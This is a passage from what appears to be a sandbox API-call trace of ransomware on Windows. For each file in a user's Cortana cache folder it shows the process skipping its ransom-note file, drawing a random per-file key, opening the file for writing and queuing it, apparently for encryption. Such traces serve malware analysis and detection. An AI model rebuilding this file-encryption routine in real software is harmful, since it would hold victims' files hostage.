lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_18[1].txt") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_18[1].txt" [0119.012] CreateIoCompletionPort (FileHandle=0x33c, ExistingCompletionPort=0x274, CompletionKey=0x680348, NumberOfConcurrentThreads=0x0) returned 0x274 [0119.012] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x680348, lpOverlapped=0x680348) returned 1 [0119.015] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xec0b4810, ftCreationTime.dwHighDateTime=0x1d7045f, ftLastAccessTime.dwLowDateTime=0xec0b4810, ftLastAccessTime.dwHighDateTime=0x1d7045f, ftLastWriteTime.dwLowDateTime=0x397bcfe8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x381, dwReserved0=0x318f740, dwReserved1=0x63d098, cFileName="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_19[1].txt", cAlternateFileName="C_4A93~1.TXT")) returned 1 [0119.015] StrStrIW (lpFirst="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_19[1].txt", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.015] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_19[1].txt") returned 197 [0119.015] PathFindExtensionW (pszPath="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_19[1].txt") returned=".txt" [0119.015] lstrlenW (lpString=".txt") returned 4 [0119.015] PathFindExtensionW (pszPath="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_19[1].txt") returned=".txt" [0119.015] SystemFunction036 (in: RandomBuffer=0x19d830, RandomBufferLength=0x20 | out: RandomBuffer=0x19d830) returned 1 [0119.015] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_19[1].txt" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\c1j92j4x\\6\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_19[1].txt"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x33c [0119.016] GetFileSizeEx (in: hFile=0x33c, lpFileSize=0x19d854 | out: lpFileSize=0x19d854*=897) returned 1 [0119.016] GetProcessHeap () returned 0x600000 [0119.016] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x680348 [0119.016] wsprintfW (in: param_1=0x19d76e, param_2="%02X" | out: param_1="B6") returned 2 [0119.016] wsprintfW (in: param_1=0x19d772, param_2="%02X" | out: param_1="37") returned 2 [0119.016] wsprintfW (in: param_1=0x19d776, param_2="%02X" | out: param_1="AB") returned 2 [0119.016] wsprintfW (in: param_1=0x19d77a, param_2="%02X" | out: param_1="9C") returned 2 [0119.016] wsprintfW (in: param_1=0x19d77e, param_2="%02X" | out: param_1="54") returned 2 [0119.016] wsprintfW (in: param_1=0x19d782, param_2="%02X" | out: param_1="B6") returned 2 [0119.016] wsprintfW (in: param_1=0x19d786, param_2="%02X" | out: param_1="6D") returned 2 [0119.016] wsprintfW (in: param_1=0x19d78a, param_2="%02X" | out: param_1="5B") returned 2 [0119.016] wsprintfW (in: param_1=0x19d78e, param_2="%02X" | out: param_1="ED") returned 2 [0119.016] wsprintfW (in: param_1=0x19d792, param_2="%02X" | out: param_1="60") returned 2 [0119.016] wsprintfW (in: param_1=0x19d796, param_2="%02X" | out: param_1="DA") returned 2 [0119.016] wsprintfW (in: param_1=0x19d79a, param_2="%02X" | out: param_1="39") returned 2 [0119.016] wsprintfW (in: param_1=0x19d79e, param_2="%02X" | out: param_1="9D") returned 2 [0119.016] wsprintfW (in: param_1=0x19d7a2, param_2="%02X" | out: param_1="98") returned 2 [0119.017] wsprintfW (in: param_1=0x19d7a6, param_2="%02X" | out: param_1="3A") returned 2 [0119.017] wsprintfW (in: param_1=0x19d7aa, param_2="%02X" | out: param_1="78") returned 2 [0119.017] wsprintfW (in: param_1=0x19d7ae, param_2="%02X" | out: param_1="59") returned 2 [0119.017] wsprintfW (in: param_1=0x19d7b2, param_2="%02X" | out: param_1="EE") returned 2 [0119.017] wsprintfW (in: param_1=0x19d7b6, param_2="%02X" | out: param_1="F0") returned 2 [0119.017] wsprintfW (in: param_1=0x19d7ba, param_2="%02X" | out: param_1="8D") returned 2 [0119.017] wsprintfW (in: param_1=0x19d7be, param_2="%02X" | out: param_1="5F") returned 2 [0119.017] wsprintfW (in: param_1=0x19d7c2, param_2="%02X" | out: param_1="91") returned 2 [0119.017] wsprintfW (in: param_1=0x19d7c6, param_2="%02X" | out: param_1="47") returned 2 [0119.017] wsprintfW (in: param_1=0x19d7ca, param_2="%02X" | out: param_1="E5") returned 2 [0119.017] wsprintfW (in: param_1=0x19d7ce, param_2="%02X" | out: param_1="29") returned 2 [0119.017] wsprintfW (in: param_1=0x19d7d2, param_2="%02X" | out: param_1="EB") returned 2 [0119.017] wsprintfW (in: param_1=0x19d7d6, param_2="%02X" | out: param_1="A9") returned 2 [0119.017] wsprintfW (in: param_1=0x19d7da, param_2="%02X" | out: param_1="96") returned 2 [0119.017] wsprintfW (in: param_1=0x19d7de, param_2="%02X" | out: param_1="2B") returned 2 [0119.017] wsprintfW (in: param_1=0x19d7e2, param_2="%02X" | out: param_1="27") returned 2 [0119.017] wsprintfW (in: param_1=0x19d7e6, param_2="%02X" | out: param_1="A2") returned 2 [0119.017] wsprintfW (in: param_1=0x19d7ea, param_2="%02X" | out: param_1="14") returned 2 [0119.017] lstrcpyW (in: lpString1=0x6903fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_19[1].txt" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_19[1].txt") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_19[1].txt" [0119.017] CreateIoCompletionPort (FileHandle=0x33c, ExistingCompletionPort=0x274, CompletionKey=0x680348, NumberOfConcurrentThreads=0x0) returned 0x274 [0119.018] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x680348, lpOverlapped=0x680348) returned 1 [0119.018] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xec0b4810, ftCreationTime.dwHighDateTime=0x1d7045f, ftLastAccessTime.dwLowDateTime=0xec0b4810, ftLastAccessTime.dwHighDateTime=0x1d7045f, ftLastWriteTime.dwLowDateTime=0x39796d8e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x648, dwReserved0=0x318f740, dwReserved1=0x63d098, cFileName="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_20[1].txt", cAlternateFileName="C_1F20~1.TXT")) returned 1 [0119.018] StrStrIW (lpFirst="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_20[1].txt", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.018] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_20[1].txt") returned 197 [0119.018] PathFindExtensionW (pszPath="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_20[1].txt") returned=".txt" [0119.018] lstrlenW (lpString=".txt") returned 4 [0119.018] PathFindExtensionW (pszPath="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_20[1].txt") returned=".txt" [0119.018] SystemFunction036 (in: RandomBuffer=0x19d830, RandomBufferLength=0x20 | out: RandomBuffer=0x19d830) returned 1 [0119.018] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_20[1].txt" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\c1j92j4x\\6\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_20[1].txt"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x334 [0119.018] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x19d854 | out: lpFileSize=0x19d854*=1608) returned 1 [0119.018] GetProcessHeap () returned 0x600000 [0119.019] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0119.026] wsprintfW (in: param_1=0x19d76e, param_2="%02X" | out: param_1="A1") returned 2 [0119.026] wsprintfW (in: param_1=0x19d772, param_2="%02X" | out: param_1="59") returned 2 [0119.026] wsprintfW (in: param_1=0x19d776, param_2="%02X" | out: param_1="D4") returned 2 [0119.026] wsprintfW (in: param_1=0x19d77a, param_2="%02X" | out: param_1="42") returned 2 [0119.026] wsprintfW (in: param_1=0x19d77e, param_2="%02X" | out: param_1="89") returned 2 [0119.026] wsprintfW (in: param_1=0x19d782, param_2="%02X" | out: param_1="54") returned 2 [0119.026] wsprintfW (in: param_1=0x19d786, param_2="%02X" | out: param_1="6F") returned 2 [0119.026] wsprintfW (in: param_1=0x19d78a, param_2="%02X" | out: param_1="09") returned 2 [0119.026] wsprintfW (in: param_1=0x19d78e, param_2="%02X" | out: param_1="8E") returned 2 [0119.026] wsprintfW (in: param_1=0x19d792, param_2="%02X" | out: param_1="15") returned 2 [0119.026] wsprintfW (in: param_1=0x19d796, param_2="%02X" | out: param_1="71") returned 2 [0119.026] wsprintfW (in: param_1=0x19d79a, param_2="%02X" | out: param_1="82") returned 2 [0119.027] wsprintfW (in: param_1=0x19d79e, param_2="%02X" | out: param_1="EE") returned 2 [0119.027] wsprintfW (in: param_1=0x19d7a2, param_2="%02X" | out: param_1="81") returned 2 [0119.027] wsprintfW (in: param_1=0x19d7a6, param_2="%02X" | out: param_1="82") returned 2 [0119.027] wsprintfW (in: param_1=0x19d7aa, param_2="%02X" | out: param_1="7E") returned 2 [0119.027] wsprintfW (in: param_1=0x19d7ae, param_2="%02X" | out: param_1="4B") returned 2 [0119.027] wsprintfW (in: param_1=0x19d7b2, param_2="%02X" | out: param_1="22") returned 2 [0119.027] wsprintfW (in: param_1=0x19d7b6, param_2="%02X" | out: param_1="A3") returned 2 [0119.027] wsprintfW (in: param_1=0x19d7ba, param_2="%02X" | out: param_1="15") returned 2 [0119.027] wsprintfW (in: param_1=0x19d7be, param_2="%02X" | out: param_1="3D") returned 2 [0119.027] wsprintfW (in: param_1=0x19d7c2, param_2="%02X" | out: param_1="92") returned 2 [0119.027] wsprintfW (in: param_1=0x19d7c6, param_2="%02X" | out: param_1="81") returned 2 [0119.027] wsprintfW (in: param_1=0x19d7ca, param_2="%02X" | out: param_1="3F") returned 2 [0119.027] wsprintfW (in: param_1=0x19d7ce, param_2="%02X" | out: param_1="00") returned 2 [0119.027] wsprintfW (in: param_1=0x19d7d2, param_2="%02X" | out: param_1="69") returned 2 [0119.027] wsprintfW (in: param_1=0x19d7d6, param_2="%02X" | out: param_1="4C") returned 2 [0119.027] wsprintfW (in: param_1=0x19d7da, param_2="%02X" | out: param_1="E6") returned 2 [0119.027] wsprintfW (in: param_1=0x19d7de, param_2="%02X" | out: param_1="C0") returned 2 [0119.027] wsprintfW (in: param_1=0x19d7e2, param_2="%02X" | out: param_1="A1") returned 2 [0119.027] wsprintfW (in: param_1=0x19d7e6, param_2="%02X" | out: param_1="CC") returned 2 [0119.027] wsprintfW (in: param_1=0x19d7ea, param_2="%02X" | out: param_1="77") returned 2 [0119.027] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_20[1].txt" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_20[1].txt") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_20[1].txt" [0119.028] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0119.028] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0119.034] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xec0b4810, ftCreationTime.dwHighDateTime=0x1d7045f, ftLastAccessTime.dwLowDateTime=0xec0b4810, ftLastAccessTime.dwHighDateTime=0x1d7045f, ftLastWriteTime.dwLowDateTime=0x39796d8e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x651, dwReserved0=0x318f740, dwReserved1=0x63d098, cFileName="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_21[1].txt", cAlternateFileName="C_EA37~1.TXT")) returned 1 [0119.034] StrStrIW (lpFirst="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_21[1].txt", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.034] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_21[1].txt") returned 197 [0119.034] PathFindExtensionW (pszPath="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_21[1].txt") returned=".txt" [0119.034] lstrlenW (lpString=".txt") returned 4 [0119.034] PathFindExtensionW (pszPath="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_21[1].txt") returned=".txt" [0119.034] SystemFunction036 (in: RandomBuffer=0x19d830, RandomBufferLength=0x20 | out: RandomBuffer=0x19d830) returned 1 [0119.034] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_21[1].txt" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\c1j92j4x\\6\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_21[1].txt"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x334 [0119.035] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x19d854 | out: lpFileSize=0x19d854*=1617) returned 1 [0119.035] GetProcessHeap () returned 0x600000 [0119.035] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x680348 [0119.037] wsprintfW (in: param_1=0x19d76e, param_2="%02X" | out: param_1="6D") returned 2 [0119.037] wsprintfW (in: param_1=0x19d772, param_2="%02X" | out: param_1="5F") returned 2 [0119.037] wsprintfW (in: param_1=0x19d776, param_2="%02X" | out: param_1="D8") returned 2 [0119.037] wsprintfW (in: param_1=0x19d77a, param_2="%02X" | out: param_1="21") returned 2 [0119.037] wsprintfW (in: param_1=0x19d77e, param_2="%02X" | out: param_1="AD") returned 2 [0119.037] wsprintfW (in: param_1=0x19d782, param_2="%02X" | out: param_1="CB") returned 2 [0119.037] wsprintfW (in: param_1=0x19d786, param_2="%02X" | out: param_1="58") returned 2 [0119.037] wsprintfW (in: param_1=0x19d78a, param_2="%02X" | out: param_1="05") returned 2 [0119.038] wsprintfW (in: param_1=0x19d78e, param_2="%02X" | out: param_1="CC") returned 2 [0119.038] wsprintfW (in: param_1=0x19d792, param_2="%02X" | out: param_1="D5") returned 2 [0119.038] wsprintfW (in: param_1=0x19d796, param_2="%02X" | out: param_1="2A") returned 2 [0119.038] wsprintfW (in: param_1=0x19d79a, param_2="%02X" | out: param_1="2C") returned 2 [0119.038] wsprintfW (in: param_1=0x19d79e, param_2="%02X" | out: param_1="DA") returned 2 [0119.038] wsprintfW (in: param_1=0x19d7a2, param_2="%02X" | out: param_1="15") returned 2 [0119.038] wsprintfW (in: param_1=0x19d7a6, param_2="%02X" | out: param_1="A6") returned 2 [0119.038] wsprintfW (in: param_1=0x19d7aa, param_2="%02X" | out: param_1="67") returned 2 [0119.038] wsprintfW (in: param_1=0x19d7ae, param_2="%02X" | out: param_1="37") returned 2 [0119.038] wsprintfW (in: param_1=0x19d7b2, param_2="%02X" | out: param_1="16") returned 2 [0119.038] wsprintfW (in: param_1=0x19d7b6, param_2="%02X" | out: param_1="A2") returned 2 [0119.038] wsprintfW (in: param_1=0x19d7ba, param_2="%02X" | out: param_1="D3") returned 2 [0119.038] wsprintfW (in: param_1=0x19d7be, param_2="%02X" | out: param_1="11") returned 2 [0119.038] wsprintfW (in: param_1=0x19d7c2, param_2="%02X" | out: param_1="3D") returned 2 [0119.038] wsprintfW (in: param_1=0x19d7c6, param_2="%02X" | out: param_1="3F") returned 2 [0119.038] wsprintfW (in: param_1=0x19d7ca, param_2="%02X" | out: param_1="AC") returned 2 [0119.038] wsprintfW (in: param_1=0x19d7ce, param_2="%02X" | out: param_1="5E") returned 2 [0119.038] wsprintfW (in: param_1=0x19d7d2, param_2="%02X" | out: param_1="35") returned 2 [0119.038] wsprintfW (in: param_1=0x19d7d6, param_2="%02X" | out: param_1="B1") returned 2 [0119.038] wsprintfW (in: param_1=0x19d7da, param_2="%02X" | out: param_1="25") returned 2 [0119.038] wsprintfW (in: param_1=0x19d7de, param_2="%02X" | out: param_1="7B") returned 2 [0119.038] wsprintfW (in: param_1=0x19d7e2, param_2="%02X" | out: param_1="AA") returned 2 [0119.038] wsprintfW (in: param_1=0x19d7e6, param_2="%02X" | out: param_1="56") returned 2 [0119.038] wsprintfW (in: param_1=0x19d7ea, param_2="%02X" | out: param_1="62") returned 2 [0119.039] lstrcpyW (in: lpString1=0x6903fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_21[1].txt" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_21[1].txt") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_21[1].txt" [0119.039] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x274, CompletionKey=0x680348, NumberOfConcurrentThreads=0x0) returned 0x274 [0119.039] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x680348, lpOverlapped=0x680348) returned 1 [0119.039] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xec0da981, ftCreationTime.dwHighDateTime=0x1d7045f, ftLastAccessTime.dwLowDateTime=0xec0da981, ftLastAccessTime.dwHighDateTime=0x1d7045f, ftLastWriteTime.dwLowDateTime=0x39796d8e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3f7, dwReserved0=0x318f740, dwReserved1=0x63d098, cFileName="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_22[1].txt", cAlternateFileName="C_6402~1.TXT")) returned 1 [0119.040] StrStrIW (lpFirst="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_22[1].txt", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.040] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_22[1].txt") returned 197 [0119.040] PathFindExtensionW (pszPath="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_22[1].txt") returned=".txt" [0119.045] lstrlenW (lpString=".txt") returned 4 [0119.045] PathFindExtensionW (pszPath="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_22[1].txt") returned=".txt" [0119.045] SystemFunction036 (in: RandomBuffer=0x19d830, RandomBufferLength=0x20 | out: RandomBuffer=0x19d830) returned 1 [0119.045] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_22[1].txt" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\c1j92j4x\\6\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_22[1].txt"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x334 [0119.046] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x19d854 | out: lpFileSize=0x19d854*=1015) returned 1 [0119.046] GetProcessHeap () returned 0x600000 [0119.046] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x680348 [0119.047] wsprintfW (in: param_1=0x19d76e, param_2="%02X" | out: param_1="97") returned 2 [0119.047] wsprintfW (in: param_1=0x19d772, param_2="%02X" | out: param_1="51") returned 2 [0119.047] wsprintfW (in: param_1=0x19d776, param_2="%02X" | out: param_1="39") returned 2 [0119.047] wsprintfW (in: param_1=0x19d77a, param_2="%02X" | out: param_1="05") returned 2 [0119.047] wsprintfW (in: param_1=0x19d77e, param_2="%02X" | out: param_1="AF") returned 2 [0119.047] wsprintfW (in: param_1=0x19d782, param_2="%02X" | out: param_1="0E") returned 2 [0119.047] wsprintfW (in: param_1=0x19d786, param_2="%02X" | out: param_1="AA") returned 2 [0119.047] wsprintfW (in: param_1=0x19d78a, param_2="%02X" | out: param_1="3D") returned 2 [0119.047] wsprintfW (in: param_1=0x19d78e, param_2="%02X" | out: param_1="16") returned 2 [0119.047] wsprintfW (in: param_1=0x19d792, param_2="%02X" | out: param_1="E8") returned 2 [0119.047] wsprintfW (in: param_1=0x19d796, param_2="%02X" | out: param_1="7E") returned 2 [0119.047] wsprintfW (in: param_1=0x19d79a, param_2="%02X" | out: param_1="75") returned 2 [0119.048] wsprintfW (in: param_1=0x19d79e, param_2="%02X" | out: param_1="F8") returned 2 [0119.048] wsprintfW (in: param_1=0x19d7a2, param_2="%02X" | out: param_1="CF") returned 2 [0119.048] wsprintfW (in: param_1=0x19d7a6, param_2="%02X" | out: param_1="D6") returned 2 [0119.048] wsprintfW (in: param_1=0x19d7aa, param_2="%02X" | out: param_1="A6") returned 2 [0119.048] wsprintfW (in: param_1=0x19d7ae, param_2="%02X" | out: param_1="02") returned 2 [0119.048] wsprintfW (in: param_1=0x19d7b2, param_2="%02X" | out: param_1="D4") returned 2 [0119.048] wsprintfW (in: param_1=0x19d7b6, param_2="%02X" | out: param_1="ED") returned 2 [0119.048] wsprintfW (in: param_1=0x19d7ba, param_2="%02X" | out: param_1="0D") returned 2 [0119.048] wsprintfW (in: param_1=0x19d7be, param_2="%02X" | out: param_1="47") returned 2 [0119.048] wsprintfW (in: param_1=0x19d7c2, param_2="%02X" | out: param_1="5A") returned 2 [0119.048] wsprintfW (in: param_1=0x19d7c6, param_2="%02X" | out: param_1="94") returned 2 [0119.048] wsprintfW (in: param_1=0x19d7ca, param_2="%02X" | out: param_1="DA") returned 2 [0119.048] wsprintfW (in: param_1=0x19d7ce, param_2="%02X" | out: param_1="A5") returned 2 [0119.048] wsprintfW (in: param_1=0x19d7d2, param_2="%02X" | out: param_1="39") returned 2 [0119.048] wsprintfW (in: param_1=0x19d7d6, param_2="%02X" | out: param_1="D9") returned 2 [0119.048] wsprintfW (in: param_1=0x19d7da, param_2="%02X" | out: param_1="A2") returned 2 [0119.048] wsprintfW (in: param_1=0x19d7de, param_2="%02X" | out: param_1="9B") returned 2 [0119.048] wsprintfW (in: param_1=0x19d7e2, param_2="%02X" | out: param_1="50") returned 2 [0119.048] wsprintfW (in: param_1=0x19d7e6, param_2="%02X" | out: param_1="85") returned 2 [0119.048] wsprintfW (in: param_1=0x19d7ea, param_2="%02X" | out: param_1="08") returned 2 [0119.049] lstrcpyW (in: lpString1=0x6903fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_22[1].txt" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_22[1].txt") 